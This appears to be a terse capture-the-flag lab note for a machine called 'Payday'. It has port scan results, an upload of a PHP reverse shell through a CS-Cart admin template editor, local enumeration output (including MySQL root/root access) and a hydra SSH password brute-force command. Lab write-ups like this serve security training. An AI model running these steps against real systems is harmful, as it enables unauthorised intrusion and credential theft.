Payday

Open 192.168.157.39:22
Open 192.168.157.39:80
Open 192.168.157.39:110
Open 192.168.157.39:139
Open 192.168.157.39:143
Open 192.168.157.39:445

22/tcp open ssh syn-ack OpenSSH 4.6p1 Debian 5build1 (protocol 2.0) 80/tcp open http syn-ack Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) 110/tcp open pop3 syn-ack Dovecot pop3d

139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: MSHOME) 143/tcp open imap syn-ack Dovecot imapd 445/tcp open syn-ack Samba smbd 3.0.26a (workgroup: MSHOME)

Found CS cart software running on port 80

http://192.168.157.39/admin.php?target=template_editor

upload phtml file(php rev shell)

[*] usr020 Are there other users in an administrative groups?.............. yes!
---
adm:x:4:patrick



total 28K
drwxr-xr-x  3 root root 4.0K Sep 26 23:07 .
drwxr-xr-x 21 root root 4.0K Apr 24  2008 ..
-rw-------  1 root root    0 Sep  3  2020 .bash_history
-rw-r--r--  1 root root 2.4K Apr 19  2016 .bashrc
-rw-r--r--  1 root root  141 May 15  2007 .profile
drwxr-xr-x  2 root root 4.0K Sep 24  2008 .ssh
-rw-r--r--  1 root root 2.3K Mar 30  2017 capture.cap
----------  1 root root   33 Sep 26 23:07 proof.txt
---
[*] fst080 Can we read subdirectories under /home?......................... yes!
---
total 24
drwxr-xr-x 2 patrick patrick 4096 Mar 25  2020 .
drwxr-xr-x 3 root    root    4096 Apr 12  2016 ..
-rw------- 1 patrick patrick    0 Mar 25  2020 .bash_history
-rw-r--r-- 1 patrick patrick  220 Apr 24  2008 .bash_logout
-rw-r--r-- 1 patrick patrick 2298 Apr 24  2008 .bashrc
-rw-r--r-- 1 patrick patrick  566 Apr 24  2008 .profile
-rw-r--r-- 1 patrick patrick   33 Sep 26 23:07 local.txt



[*] net000 Services listening only on localhost............................ yes!
---
tcp    0      0                   127.0.0.1:3306                       *:*     
---


[!] sof000 Can we connect to MySQL with root/root credentials?............. yes!


Linux version 2.6.22-14-server (buildd@palmer) (gcc version 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2)) #1 SMP Sun Oct 14 23:34:23 GMT 2007
Distributor ID:	Ubuntu
Description:	Ubuntu 7.10
Release:	7.10
Codename:	gutsy



[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.6.8p12

We the bruteforce ssh user patrick using hydra

hydra -l patrick -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt 192.168.157.39 ssh

hydra -l patrick -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt 192.168.157.39 ssh

Malleum Knowledge Base

Explorer

Payday

Graph View